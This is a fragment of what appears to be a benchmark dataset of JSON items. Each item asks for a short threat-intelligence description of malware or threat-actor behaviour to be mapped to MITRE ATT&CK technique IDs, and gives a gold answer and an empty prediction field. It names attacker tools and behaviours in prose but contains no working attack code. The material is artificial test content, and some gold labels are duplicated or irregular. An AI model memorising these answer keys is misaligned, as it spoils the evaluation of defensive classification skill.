techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During this process, the adversary identifies data of interest from the network of the victim. This can be anything from file and directory-listings, configuration files, manuals, email stores in the guise of OST- and PST-files, file shares with intellectual property (IP), and data scraped from memory. If the data is small enough, it is exfiltrated through the command and control channel of the Cobalt Strike beacons. However, usually the data is compressed with WinRAR, staged on another system of the victim, and from there copied to a OneDrive-account controlled by the adversary\n\t - T1114.001: Email Collection - Local Email Collection\n\t - T1083: File and Directory Discovery\n- Text: Kimsuky has enumerated drives, OS type, OS version, and other information using a script or the \"systeminfo\" command.\n\t - T1082: System Information Discovery\n- Text: Lucifer can collect the IP address of a compromised host.\n\t - T1016: System Network Configuration Discovery\n", + "input": "Ixeshe collects the username from the victim\u2019s machine.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ursnif has used HTTPS for C2.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: No matching sample found for T1048.001\n- Text: Cobalt Group has used the Plink utility to create SSH tunnels.\n\t - T1572: Protocol Tunneling\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n", + "input": "Empire can conduct command and control over protocols like HTTP and HTTPS.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Proton uses macOS' .command file type to script actions.\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n- Text: HAWKBALL has created a cmd.exe reverse shell, executed commands, and uploaded output via the command line.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: Maze has used WMI to attempt to delete the shadow volumes on a machine, and to connect a virtual machine to the network domain of the victim organization's network.\n\t - T1047: Windows Management Instrumentation\n", + "input": "Kazuar uses /bin/bash to execute commands on the victim\u2019s machine.", + "gold": "- T1059.004: Command and Scripting Interpreter - Unix Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: CreepyDrive can use OneDrive for C2.\n\t - T1102.002: Web Service - Bidirectional Communication\n- Text: In this blog, we described how Redaman has become more effective by hiding dynamic C&C server addresses inside the Bitcoin blockchain\n\t - T1102.001: Web Service - Dead Drop Resolver\n- Text: LAPSUS$ has purchased credentials and session tokens from criminal underground forums.\n\t - T1597.002: Search Closed Sources - Purchase Technical Data\n", + "input": "BADNEWS can use multiple C2 channels, including RSS feeds, Github, forums, and blogs.", + "gold": "- T1102.002: Web Service - Bidirectional Communication", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: No matching sample found for T1548.001\n- Text: The malicious DLL is not a service DLL because it lacks ServiceMain()\n\t - T1543: Create or Modify System Process\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: Pupy can be used to establish persistence using a systemd service.\n\t - T1543.002: Create or Modify System Process - Systemd Service\n", + "input": "Exaramel for Linux can execute commands with high privileges via a specific binary with setuid functionality.", + "gold": "- T1548.001: Abuse Elevation Control Mechanism - Setuid and Setgid", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ixeshe can list running processes.\n\t - T1057: Process Discovery\n- Text: FunnyDream can identify the processes for Bkav antivirus.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: RTM can scan victim drives to look for specific banking software on the machine to determine next actions.\n\t - T1518: Software Discovery\n", + "input": "StreamEx has the ability to enumerate processes.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can gather information on the victim username.\n\t - T1033: System Owner/User Discovery\n- Text: Offset Description 0x0 Victim GUID (8C8CEED9-4326-448B-919E-249EEC0238A3) 0x25 Victim IP Address (192.168.180.154) 0x45 Command (0x66660001) 0x49 Length of payload (0x2f \u2013 47) 0x4d Field 1 \u2013 Windows major version (0x6 \u2013 Windows Vista+) 0x51 Field 2 \u2013 Windows minor version (0x1 \u2013 Windows 7) 0x55 Field 3 \u2013 Unknown (0x20) 0x59 Payload (default flag:4/2/2018 1:01:33 AM) Table 5 \u2013 Beacon structure for PLAINTEE\n\t - T1010: Application Window Discovery\n- Text: has the ability to enumerate processes.\n\t - T1057: Process Discovery\n", + "input": "HEXANE has run `whoami` on compromised machines to identify the current user.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Pillowmint has been decompressed by included shellcode prior to being launched.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: The resulting executable acts as another loader for yet another embedded file. However, this loader uses the hostname of the current system to decrypt the embedded payload. Therefore, if it is run on any system other than the one intended, the malware will fail to execute. This trait illustrates that the malware is customized; it was created specifically for the exact victim system on which it was discovered\n\t - T1480.001: Execution Guardrails - Environmental Keying\n- Text: During our analysis, we successfully extracted the command line argument to execute its payload. The following command is used to execute the payload\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n", + "input": "HyperBro can unpack and decrypt its payload prior to execution.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: No matching sample found for T1137.005\n- Text: No matching sample found for T1137.003\n- Text: OilRig has abused the Outlook Home Page feature for persistence. OilRig has also used CVE-2017-11774 to roll back the initial patch designed to protect against Home Page abuse.\n\t - T1137.004: Office Application Startup - Outlook Home Page\n", + "input": "Ruler can be used to automate the abuse of Outlook Rules to establish persistence.", + "gold": "- T1137.005: Office Application Startup - Outlook Rules", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Gold Dragon stores information gathered from the endpoint in a file named 1.hwp.\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: BADNEWS installs a registry Run key to establish persistence.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: The locations: For root user path: /Library/CoreMediaIO/Plug-Ins/FCP-DAL/iOSScreenCapture.plugin/Contents/Resources/ processname: screenassistantd For regular user path: ~/Library/Spelling/ processname: spellagentd Subsequently, it implements the Loader::installLoader method, reading the hardcoded 64-bit Mach-O executable (magic value 0xFEEDFACF), and writing to the previously determined path and file\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n", + "input": "Pteranodon creates various subdirectories under \"%Temp%\\reports\\%\" and copies files to those subdirectories. It also creates a folder at \"C:\\Users\\\\AppData\\Roaming\\Microsoft\\store\" to store screenshot JPEG files.", + "gold": "- T1074.001: Data Staged - Local Data Staging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kinsing was executed with an Ubuntu container entry point that runs shell scripts.\n\t - T1609: Container Administration Command\n- Text: This information can then be transmitted to the attacker using protocols such as FTP, HTTP, and SMTP\n\t - T1071: Application Layer Protocol\n- Text: During Operation Wocao, threat actors spawned a new `cmd.exe` process to execute commands.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", + "input": "Siloscape can run cmd through an IRC channel.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: down_new has the ability to gather information on installed applications.\n\t - T1518: Software Discovery\n- Text: TajMahal has the ability to steal documents from the local system including the print spooler queue.\n\t - T1005: Data from Local System\n- Text: Sidewinder has used tools to automatically collect system and network configuration information.\n\t - T1119: Automated Collection\n", + "input": "Operation Wocao has used a script to collect information about the infected system.", + "gold": "- T1119: Automated Collection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: used a tool called MailSniper to search for files on the desktop and another utility called Sobolsoft to extract attachments from EML files.\n\t - T1083: File and Directory Discovery\n- Text: To install this module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable\n\t - T1574.007: Hijack Execution Flow - Path Interception by PATH Environment Variable\n- Text: Wizard Spider has used the \u201cnet view\u201d command to locate mapped network shares.\n\t - T1135: Network Share Discovery\n", + "input": "SoreFang has the ability to list directories.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Upon opening the attachment, a typical luring mechanism is employed instructing the victim to enable macros, as seen in Figure 2. FireEye has observed the attackers behind this campaign using three different approaches\n\t - T1204.002: User Execution - Malicious File\n- Text: Figure 7: Dropbox-themed landing page with a lure asking users to click a button that links to the malicious document\n\t - T1204.001: User Execution - Malicious Link\n- Text: In March 2016, a financially motivated threat actor launched several tailored spear phishing campaigns primarily targeting the retail, restaurant, and hospitality industries. The emails contained variations of Microsoft Word documents with embedded macros that, when enabled, downloaded and executed a malicious downloader that we refer to as PUNCHBUGGY\n\t - T1566.001: Phishing - Spearphishing Attachment\n", + "input": "LazyScripter has lured users to open malicious email attachments.", + "gold": "- T1204.002: User Execution - Malicious File", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: LOWBALL uses the Dropbox cloud storage service for command and control.\n\t - T1102.002: Web Service - Bidirectional Communication\n- Text: For instance, here are the resulting decrypted strings from each of the case statements (dd7e69e1\u2026): Case \u2013 String decrypted 1 \u2013 185.25.50[.]93 2 \u2013 POST http://185.25.50[.]93/syshelp/kd8812u/protocol.php HTTP/1.1\\r\\nHost: 185.25.50[.]93\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: 3 \u2013 porg= 4 \u2013 Content-Length: The Trojan uses raw sockets to communicate with its C2 server and uses the decrypted string above to create HTTP requests\n\t - T1071: Application Layer Protocol\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1008: Fallback Channels\n- Text: ShadowPad uses a DGA that is based on the day of the month for C2 servers.\n\t - T1568.002: Dynamic Resolution - Domain Generation Algorithms\n", + "input": "Revenge RAT used blogpost.com as its primary command and control server during a campaign.", + "gold": "- T1102.002: Web Service - Bidirectional Communication", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: deobfuscates its strings and APIs once its executed.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: We also identified a Tomiris variant (internally named \u201cSBZ\u201d, MD5 51AA89452A9E57F646AB64BE6217788E) which acts as a filestealer, and uploads any recent file matching a hardcoded set of extensions (.doc, .docx, .pdf, .rar, etc. to the C2\n\t - T1041: Exfiltration Over C2 Channel\n- Text: Even though network monitoring and detection capabilities do not come easy for many organizations, they can generally offer a high return on investment if implemented correctly. Malware has to contact its C2 server if it is to receive further instructions. This article will demonstrate how to detect this communication before threat actors accomplish their objectives. There are a couple of factors that we can utilize to fingerprint any suspicious traffic and subsequent infrastructure. Before we get into that part, we should first discuss what makes Cobalt Strike so versatile.\n\t - T1102.002: Web Service - Bidirectional Communication\n\t - T1102.003: Web Service - One-Way Communication\n", + "input": "AppleJeus has decoded files received from a C2.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The implanted VBS file is capable of reporting information about infected machines and downloading additional payloads with an encoded format\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: PlugX has a module for capturing keystrokes per process including window titles.\n\t - T1056.001: Input Capture - Keylogging\n- Text: The latter PowerShell injects a shellcode into its own process using well-known CreateThread and VirtualAlloc techniques: SHELLCODE: The shellcode phase of this attack is unique and demonstrates the constantly advancing abilities of attackers\n\t - T1064: Scripting\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", + "input": "HEXANE has used a VisualBasic script named `MicrosoftUpdator.vbs` for execution of a PowerShell keylogger.", + "gold": "- T1059.005: Command and Scripting Interpreter - Visual Basic", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The wiper is relatively small in size and dynamically resolves most of the APIs it uses. Before starting any file destruction, it checks to ensure that the machine is not a domain controller. If the machine is a domain controller, it stops execution. Pseudo-code: CaddyWiper checking for the Domain Controller role of the machine. If the system is not a domain controller, the wiper will destroy files on \"C:\\Users,\" followed by wiping of all files in the next drive letter until it reaches the \"Z\" drive. This means that the wiper will also attempt to wipe any network mapped drive attached to the system\n\t - T1082: System Information Discovery\n- Text: All trusted domains, domains, and domain controllers - A list of computers and network devices on the network - The infected machine user and groups the user belongs to - The infected machine, including machine name, operating system, workstation domain, and more information - Network adapters that have connected to the machine and DNS servers\n\t - T1069: Permission Groups Discovery\n\t - T1033: System Owner/User Discovery\n\t - T1016: System Network Configuration Discovery\n- Text: Lazarus Group executed Responder using the command \"[Responder file path] -i [IP address] -rPv\" on a compromised host to harvest credentials and move laterally.\n\t - T1557.001: Adversary-in-the-Middle - LLMNR/NBT-NS Poisoning and SMB Relay\n", + "input": "can collect system information, including computer name, system manufacturer, IsDebuggerPresent state, and execution path.", + "gold": "- T1082: System Information Discovery\n- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Saint Bot had used `InstallUtil.exe` to download and deploy executables.\n\t - T1218.004: System Binary Proxy Execution - InstallUtil\n- Text: Pteranodon can use mshta.exe to execute an HTA file hosted on a remote server.\n\t - T1218.005: System Binary Proxy Execution - Mshta\n- Text: The actors used valid credentials obtained using MimiKatz variants to escalate privileges. We\u2019ve observed Mimikatz being executed both from the file system of victim hosts and via PowerShell cmdlets executed via Cobalt Strike BEACON. Actors have gained access to credentials via exported copies of the ntds.dit Active Directory database and SYSTEM and SECURITY registry hives from a Domain Controller\n\t - T1003.003: OS Credential Dumping - NTDS\n", + "input": "Mustang Panda has used \"InstallUtil.exe\" to execute a malicious Beacon stager.", + "gold": "- T1218.004: System Binary Proxy Execution - InstallUtil", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Spreadsheets and documents with customer lists, investments and trading operations - Internal presentations - Software licenses and credentials for trading software/platforms - Cookies and session information from browsers - Email credentials - Customer credit card information and proof of address/identity documents\n\t - T1539: Steal Web Session Cookie\n- Text: WarzoneRAT has the capability to grab passwords from numerous web browsers as well as from Outlook and Thunderbird email clients.\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: APT29 has bypassed MFA set on OWA accounts by generating a cookie value from a previously stolen secret key.\n\t - T1606.001: Forge Web Credentials - Web Cookies\n", + "input": "TajMahal has the ability to steal web session cookies from Internet Explorer, Netscape Navigator, FireFox and RealNetworks applications.", + "gold": "- T1539: Steal Web Session Cookie", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Milan can use HTTPS for communication with C2.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: Before being appended to image files, HAMMERTOSS commands are encrypted with a key composed of both a hard-coded value and a string contained on that day's tweet. To decrypt the commands, an investigator would need access to the intended malware sample, the day's tweet, and the image file containing the command.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: Cobalt Strike can mimic the HTTP protocol for C2 communication, while hiding the actual data in either an HTTP header, URI parameter, the transaction body, or appending it to the URI.\n\t - T1001.003: Data Obfuscation - Protocol Impersonation\n", + "input": "APT18 uses HTTP for C2 communications.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can perform DLL injection.\n\t - T1055: Process Injection\n- Text: The Leeson, Neoichor, and NumbIdea malware families typically use the Internet Explorer (IE) COM interface to connect and receive commands from hardcoded C2 servers\n\t - T1559.001: Inter-Process Communication - Component Object Model\n- Text: BOOTRASH is a Volume Boot Record (VBR) bootkit that uses the VBR to maintain persistence.\n\t - T1542.003: Pre-OS Boot - Bootkit\n", + "input": "Bumblebee has used `rundll32` for execution of the loader component.", + "gold": "- T1218.011: System Binary Proxy Execution - Rundll32", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The Delphi variant of Zebrocy delivered in this attack campaign are very similar to the Delphi downloader discussed in our previous Zebrocy research published in June 2018. While this Delphi variant was known, the C# and VB.NET variants delivered in this attack campaign were previously unknown. An interesting note on these payloads is that all the Delphi payloads delivered in this campaign were packed with UPX, while none of the other payloads were packed. While we can only speculate on the specific reason, it is likely Sofacy packed only the Delphi variants in an attempt to increase evasion as the Delphi variant of Zebrocy is known and has been widely analyzed\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: Opening document starts a template injection technique for loading the document template from the internet.\n\t - T1221: Template Injection\n- Text: LazyScripter has used JavaScript in its attacks.\n\t - T1059.007: Command and Scripting Interpreter - JavaScript\n", + "input": "jRAT payloads have been packed.", + "gold": "- T1027.002: Obfuscated Files or Information - Software Packing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lastly, if the HTTP request is not successful, the downloader will fallback to using DNS tunneling to establish communications\n\t - T1071: Application Layer Protocol\n- Text: HAFNIUM has used TCP for C2.\n\t - T1095: Non-Application Layer Protocol\n- Text: Ixeshe uses HTTP for command and control.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", + "input": "Clambling has the ability to use Telnet for communication.", + "gold": "- T1071: Application Layer Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Nomadic Octopus used \"cmd.exe /c\" within a malicious macro.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: ThiefQuest uses AppleScript's \"osascript -e\" command to launch ThiefQuest's persistence via Launch Agent and Launch Daemon.\n\t - T1059.002: Command and Scripting Interpreter - AppleScript\n- Text: Intrusions and campaigns conducted by this group are in-line with PRC goals and self-interest in Taiwan\n\t - T1059: Command and Scripting Interpreter\n", + "input": "MoleNet can execute commands via the command line utility.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: After the exploit succeeds, this Fallout Exploit Kit downloads a \u201c.tmp\u201d file to the %Temp% directory and calls CreateProcess to execute it. Further analysis revealed that the \u201c.tmp\u201d file was the latest variant of Azorult malware. It was the first time we\u2019ve seen the new variant of Azorult malware used as primary payload for Fallout Exploit Kit\n\t - T1105: Ingress Tool Transfer\n- Text: The ransomware payload is copied to an Active Directory Domain Controller and deployed to systems using the Default Domain Group Policy Object\n\t - T1570: Lateral Tool Transfer\n- Text: Azorult uses an XOR key to decrypt content and uses Base64 to decode the C2 address.\n\t - T1140: Deobfuscate/Decode Files or Information\n", + "input": "APT41 used certutil to download additional files.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During Night Dragon, threat actors used domain accounts to gain further access to victim systems.\n\t - T1078.002: Valid Accounts - Domain Accounts\n- Text: Initial QAKBOT .zip file bypasses some antivirus detections due to password protections.\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1588.001: Obtain Capabilities - Malware\n- Text: Threat Group-3390 has moved staged encrypted archives to Internet-facing servers that had previously been compromised with China Chopper prior to exfiltration.\n\t - T1074.002: Data Staged - Remote Data Staging\n", + "input": "During Night Dragon, threat actors used administrative utilities to deliver Trojan components to remote systems.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat 